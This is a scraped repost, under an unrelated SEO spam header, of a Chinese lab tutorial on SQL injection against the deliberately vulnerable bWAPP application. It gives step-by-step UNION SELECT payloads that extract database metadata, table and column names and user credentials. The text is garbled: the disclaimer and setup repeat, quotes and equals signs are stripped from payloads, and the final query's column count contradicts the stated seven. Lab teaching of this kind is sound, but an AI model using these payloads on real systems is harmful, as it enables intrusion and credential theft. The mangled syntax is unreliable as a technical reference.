河北網(wǎng)站seo地址網(wǎng)站建設(shè)全屏
鶴壁市浩天電氣有限公司
2026/01/24 08:28:27
河北網(wǎng)站seo地址,網(wǎng)站建設(shè)全屏,網(wǎng)站主機(jī)名是什么,滄州南皮手機(jī)網(wǎng)站建設(shè)重要聲明
SQL注入實(shí)驗(yàn)僅可在自己搭建的合法測(cè)試環(huán)境#xff08;如本地虛擬機(jī)、授權(quán)的測(cè)試服務(wù)器#xff09;中進(jìn)行#xff0c;嚴(yán)禁對(duì)任何非授權(quán)系統(tǒng)實(shí)施測(cè)試#xff0c;否則可能違反《網(wǎng)絡(luò)安全法》等法律法規(guī)#xff0c;需承擔(dān)相應(yīng)法律責(zé)任。
一、實(shí)驗(yàn)環(huán)境
操作系統(tǒng)如本地虛擬機(jī)、授權(quán)的測(cè)試服務(wù)器中進(jìn)行嚴(yán)禁對(duì)任何非授權(quán)系統(tǒng)實(shí)施測(cè)試否則可能違反《網(wǎng)絡(luò)安全法》等法律法規(guī)需承擔(dān)相應(yīng)法律責(zé)任。一、實(shí)驗(yàn)環(huán)境操作系統(tǒng)Linux、Windows10,平臺(tái)天樞一體化虛擬仿真平臺(tái)1、bwapp環(huán)境準(zhǔn)備環(huán)境部署平臺(tái)已完成部署環(huán)境訪問瀏覽器輸入http://192.168.0.100點(diǎn)擊“Login”進(jìn)入登錄頁(yè)默認(rèn)賬號(hào)密碼bee/bug安全級(jí)別設(shè)置登錄后點(diǎn)擊頂部“Security Level”選擇“Low”關(guān)閉基礎(chǔ)防護(hù)便于注入測(cè)試點(diǎn)擊“Apply”保存場(chǎng)景定位點(diǎn)擊頂部“Buggy Apps”在下拉菜單中根據(jù)場(chǎng)景類型選擇對(duì)應(yīng)模塊即可進(jìn)入目標(biāo)測(cè)試頁(yè)面。1 使用前需要配置鍵盤(2)IP配置用戶名bee,密碼bugsudo ip addr add 192.168.1.100/24 dev 網(wǎng)卡名二、SQL注入常見場(chǎng)景分類及核心特征bwapp環(huán)境適配SQL注入按請(qǐng)求方式、應(yīng)用場(chǎng)景可分為6類核心原理均為“用戶輸入未過濾直接拼接SQL”但注入點(diǎn)位置、參數(shù)傳遞方式存在差異。1、SQL Injection (GET/Search)GET請(qǐng)求搜索類注入bwapp場(chǎng)景定位Buggy Apps SQL Injection SQL Injection - Search (GET)實(shí)驗(yàn)步驟正常業(yè)務(wù)驗(yàn)證進(jìn)入測(cè)試頁(yè)面在搜索框輸入Man點(diǎn)擊“Search”頁(yè)面顯示包含“Man”的用戶信息正常響應(yīng)1步驟1判斷注入點(diǎn)類型及存在性在搜索框輸入man添加單引號(hào)點(diǎn)擊“Search”頁(yè)面顯示MySQL語(yǔ)法錯(cuò)誤如You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near bee at line 1說(shuō)明存在字符型注入注釋符驗(yàn)證輸入man --注意--后加空格點(diǎn)擊“Search”頁(yè)面無(wú)語(yǔ)法錯(cuò)誤且正常顯示結(jié)果確認(rèn)注入點(diǎn)有效2步驟2判斷查詢的字段數(shù)① 判斷列數(shù)輸入Manorder by1---點(diǎn)擊“Search”頁(yè)面正常顯示依次輸入至此說(shuō)明查詢結(jié)果為7列② 利用MySQL自帶的information_schema庫(kù)提取當(dāng)前數(shù)據(jù)庫(kù)名、版本、用戶等信息目標(biāo)信息構(gòu)造URL示例當(dāng)前數(shù)據(jù)庫(kù)名http://192.168.0.100/bwapp/sqli_1.php?titlemanunionselect1,database(),34,5,6,7---MySQL版本http://192.168.0.100/bwapp/sqli_1.php?titlemanunionselect1,version(),34,5,6,7---數(shù)據(jù)庫(kù)用戶http://192.168.0.100/bwapp/sqli_1.php?titlemanunionselect1,user(),34,5,6,7---數(shù)據(jù)存儲(chǔ)目錄http://192.168.0.100/bwapp/sqli_1.php?titlemanunionselect1,datadir,3,4,5,6,7---示例結(jié)果當(dāng)前數(shù)據(jù)庫(kù)名是bwappMySQL版本為5.0.96用戶為rootlocalhost。數(shù)據(jù)存儲(chǔ)目錄3步驟3獲取數(shù)據(jù)庫(kù)中的表名提取bwapp數(shù)據(jù)庫(kù)下的所有表名重點(diǎn)關(guān)注users表存儲(chǔ)賬號(hào)密碼http://192.168.0.100/bwapp/sqli_1.php?titleman UNION SELECT 1,table_name,3,4,5,6,7 FROM information_schema.tables WHERE table_schemadatabase()-- -頁(yè)面會(huì)列出表名users、movies、blogs、guestbook等核心目標(biāo)users。4步驟4獲取users表的列名提取users表的所有列名如賬號(hào)、密碼、郵箱等http://192.168.0.100/bwapp/sqli_1.php?titleman UNION SELECT 1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_schemadatabase() AND table_nameusers -- -頁(yè)面會(huì)顯示列名id、username、password、email、admin等。5步驟5提取users表的賬號(hào)密碼數(shù)據(jù)最終目標(biāo)獲取用戶憑證構(gòu)造URL如下因本次用戶名在login列http://192.168.0.100/bwapp/sqli_1.php?titleman UNION SELECT 1,login,password FROM users -- -頁(yè)面會(huì)顯示解密MD5值bee→bug與BWAPP默認(rèn)密碼一致。6步驟6驗(yàn)證結(jié)果用提取到的bee→bug登錄BWAPP驗(yàn)證賬號(hào)密碼的有效性。